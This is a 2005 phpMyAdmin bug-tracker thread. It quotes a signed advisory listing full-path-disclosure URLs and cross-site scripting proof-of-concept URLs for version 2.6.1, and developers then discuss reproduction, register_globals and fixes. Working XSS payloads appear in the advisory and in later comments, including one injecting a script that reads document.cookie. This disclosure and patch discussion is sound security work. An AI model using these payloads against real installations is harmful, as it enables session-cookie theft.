Menu

#1610 (in 2.6.1-pl1) Possible XSS Attacks

2.6.1
invalid
1
2015-01-27
2005-02-22
No

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpMyAdmin 2.6.1 Full Path Disclosure and XSS cXIb8O3.5]

Author: cXIb8O3
Date: 22.2.2005

- --- 0.Description ---
phpMyAdmin 2.6.1 is a tool written in PHP intended to
handle the administration of MySQL over the Web.
Currently it can create and drop databases,
create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.

- --- 1. Full Path Disclosure ---
1.0
http://\[HOST]/[DIR]/libraries/sqlvalidator.lib.php?cfg[SQLValidator][use]=cXIb8O3
Error message :
- ---------------
Warning: main(./libraries/sqlvalidator.class.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39

Fatal error: main() [function.require]: Failed opening
required './libraries/sqlvalidator.class.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlvalidator.lib.php on
line 39

1.1
http://\[HOST]/[DIR]/libraries/sqlparser.lib.php

Error message :
- ---------------
Warning: main(./libraries/string.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46

Fatal error: main() [function.require]: Failed opening
required './libraries/string.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/sqlparser.lib.php on
line 46
- ---------------

1.2
http://\[HOST]/[DIR]/libraries/select_theme.lib.php

Error message :
- ---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34

Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_theme.lib.php on
line 34
- ---------------

1.3
http://\[HOST]/[DIR]/libraries/select_lang.lib.php

Error message :
- ---------------
Warning: main(./libraries/grab_globals.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14

Fatal error: main() [function.require]: Failed opening
required './libraries/grab_globals.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/select_lang.lib.php on
line 14
- ---------------

1.4
http://\[HOST]/[DIR]/libraries/relation_cleanup.lib.php

Error message :
- ---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10

Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/relation_cleanup.lib.php
on line 10
- ---------------

1.5
http://\[HOST]/[DIR]/libraries/header_meta_style.inc.php

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/header_meta_style.inc.php
on line 9
- ---------------

1.6
http://\[HOST]/[DIR]/libraries/get_foreign.lib.php?foreigners=cXIb8O3&field=hi&foreigners[hi]=unloved

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_countRecords() in
/www/phpMyAdmin-2.6.1/libraries/get_foreign.lib.php on
line 28
- ---------------

1.7
http://\[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_linkOrButton() in
/www/phpMyAdmin-2.6.1/libraries/display_tbl_links.lib.php
on line 28
- ---------------

1.8
http://\[HOST]/[DIR]/libraries/display_export.lib.php

Error message :
- ---------------
Warning: main(./libraries/relation.lib.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6

Fatal error: main() [function.require]: Failed opening
required './libraries/relation.lib.php'
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/display_export.lib.php
on line 6
- ---------------

1.9
http://\[HOST]/[DIR]/libraries/db_table_exists.lib.php

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_sendHeaderLocation() in
/www/phpMyAdmin-2.6.1/libraries/db_table_exists.lib.php
on line 16
- ---------------

1.10
http://\[HOST]/[DIR]/libraries/charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=smutno&allow_recoding=mi

Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/charset_conversion.lib.php
on line 42
- ---------------

1.11
http://\[HOST]/[DIR]/libraries/fpdf/ufpdf.php

Error message :
- ---------------
Warning: main(./libraries/fpdf/fpdf.php)
[function.main]: failed to open stream: No such file or
directory in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18

Warning: main() [function.include]: Failed opening
'./libraries/fpdf/fpdf.php' for inclusion
(include_path='.:') in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 18

Fatal error: Class 'FPDF' not found in
/www/phpMyAdmin-2.6.1/libraries/fpdf/ufpdf.php on line 20
- ---------------

1.12
http://\[HOST]/[DIR]/libraries/dbi/mysqli.dbi.lib.php

Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbi/mysqli.dbi.lib.php
on line 13
- ---------------

1.13
http://\[HOST]/[DIR]/libraries/dbg/setup.php?GLOBALS[cfg][DBG][enable]=cXIb

Error message :
- ---------------
Fatal error: Call to undefined function PMA_dl() in
/www/phpMyAdmin-2.6.1/libraries/dbg/setup.php on line 10
- ---------------

1.14
http://\[HOST]/[DIR]/libraries/auth/cookie.auth.lib.php?coming_from_common=cXIb8O3

Error message :
- ---------------
Fatal error: Call to undefined function
PMA_setFontSizes() in
/www/phpMyAdmin-2.6.1/libraries/auth/cookie.auth.lib.php
on line 17
- ---------------

- --- 2. XSS aka Cross Site Scripting ---

2.0
http://\[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]

http://\[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]

http://\[HOST]/[DIR]/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS

2.1
http://\[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]

http://\[HOST]/[DIR]/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]

2.2
http://\[HOST]/[DIR]/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
and more in this file.

2.3
http://\[HOST]/[DIR]/themes/original/css/theme_right.css.php?right_font_family=[XSS]
and more in this file.

- --- 3. How to fix ---

Download the new version of the script or update.

- --- 4. Greets ---

sp3x and ladyBMS

- --- 5.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
http://securityreason.com/ Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCG5UVznmvyJCR4zQRAjWPAJ426XMVICiyHa8uWL0bkuTaXbeMNACdFRzq
BrQu2PRFI/Myhw5gg8rGW9s=
=miO8
-----END PGP SIGNATURE-----

i am waiting for a paches...

Discussion

  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Maksymilian,

    thank you for your report.

    First of all, please do not submit two different issues with
    one bug report.

    The first issue (path disclosure) was already reported to us
    and we are currently dealing with it. Please note, that you
    can only exploit it if the php setting "display_errors" is
    set to 1. The php manual advices to disable this feature on
    productional systems.

    http://de2.php.net/manual/en/ref.errorfunc.php#ini.display-errors

    Thank you,

    Alexander M. Turek

     
  • Alexander M. Turek

    • summary: [phpMyAdmin 2.6.1 Full Path Disclosure and XSS cXIb8O3.5] --> (2.6.1) Full Path Disclosure and XSS
     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    Ok.. so path disclosure is non critical etc..
    but XSS..

     
  • Alexander M. Turek

    • priority: 5 --> 9
    • assigned_to: nobody --> rabus
    • labels: --> Security / Restrictions
    • milestone: --> 2.6.1
    • status: open --> open-accepted
     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    OK, let's do this. :-)

    2.0: With grab_globals.lib.php, rev. 2.8 (attached to bug
    #1149381), I cannot reproduce these exploits anymore.

    2.1, 2.2 and 2.3: These exploits require "register_globals"
    to be enabled in php.ini. This setting is considered to be
    very dangerous and therefor disabled by default since php 4.2.0.

    http://de3.php.net/register_globals

    Maksymilian, is there any XSS attack you can see with my
    latest patch and register_globals = Off? If not, I'd like to
    mark this bug as fixed, too.

     
  • Michal Čihař

    Michal Čihař - 2005-02-23

    Logged In: YES
    user_id=192186

    Ad 2.1: I suggest making content of that file function and
    call it with all neded params instead of including.

    Ad 2.2 and 2.3: I can't find anything dangerous in modifying
    CSS.

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Michal, when the script is called directly, the headers that
    declare the code to be CSS are not sent. The browser would
    expect HTML code, so you could inject harmful JS code here.

    Were you able to reproduce the exploits?

     
  • Michal Čihař

    Michal Čihař - 2005-02-23

    Logged In: YES
    user_id=192186

    Maksymilian: When you sign messages using pgp, you should
    publish public key on keyserver, otherwise it doesn't make
    much sense.

    rabus: I can reproduce it only with register_globals on. But
    its really hard to make there valid javascript when
    magic_quotes_gpc is enabled (what is default).

     
  • Marc Delisle

    Marc Delisle - 2005-02-23

    Logged In: YES
    user_id=210714

    Alexander,
    for 2.0, I am able to reproduce, with PMA 2.6.1, using
    /libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    It happens also with current cvs HEAD (grab_globals.lib.php 2.8)

     
  • Michal Čihař

    Michal Čihař - 2005-02-23

    Logged In: YES
    user_id=192186

    Marc: you have register_globals on ;-)

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Michal is right. With register_globals set to off, the
    should not be possible anymore:

    http://rabus.phpmyadmin.net/demos/CVS_LATEST/libraries/select_server.lib.php?cfg\[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    If register_globals is on, it is almost impossible to avoid
    such problems.

     
  • Marc Delisle

    Marc Delisle - 2005-02-23

    Logged In: YES
    user_id=210714

    Yes I have register_globals set to On; you see, here many
    scripts are running, which depend on this setting .... And
    I'm probably not the only one.

    We have PMA_sanitize() which can take care of this. However,
    I should put it into another include and call it from the
    top of each script: much work in perspective.

     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Marc,

    this is mainly why it is possible to trigger this setting on
    a per-directory basis. Enabling register_globals in php.ini
    is dangerous and getting phpMyAdmin to detect harmful
    variable injections is not that trivial right now.

     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    ok so..
    if register_globals=Off css`s non exist but if
    register_globals=On can i make xss attack.
    For example
    If i have www in server X where register_globals=On and
    phpmyadmin in my www, i nothing can do it. Better remove
    this xss from phpmyadmin. ;]

     
  • Alexander M. Turek

    • priority: 9 --> 1
    • summary: (2.6.1) Full Path Disclosure and XSS --> (in 2.6.1-pl1) Possible XSS Attacks
    • status: open-accepted --> open-fixed
     
  • Alexander M. Turek

    Logged In: YES
    user_id=418833

    Sure you can, at least if you are using the Apache Webserver:

    echo "php_flag register_globals off" >>
    /path/to/phpMyAdmin/.htaccess

    If not, there is probably a way to change php settings on a
    per-directory basis in other webservers too.

    Working around register_globals injections is almost
    impossible for a project of our size. We will try to fix
    this as far as possible with upcoming releases, but we can
    never guarantee that you are fully protected against such
    exploits. Securing php against them is mainly your task, not
    ours. Sorry. :-/

     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    Ok... [:

     
  • Maksymilian Arciemowicz

    Logged In: YES
    user_id=1225357

    Ok... [:

     
  • Alexander M. Turek

    • status: open-fixed --> closed-fixed
     
  • Michal Čihař

    Michal Čihař - 2013-06-11
    • Status: closed-fixed --> invalid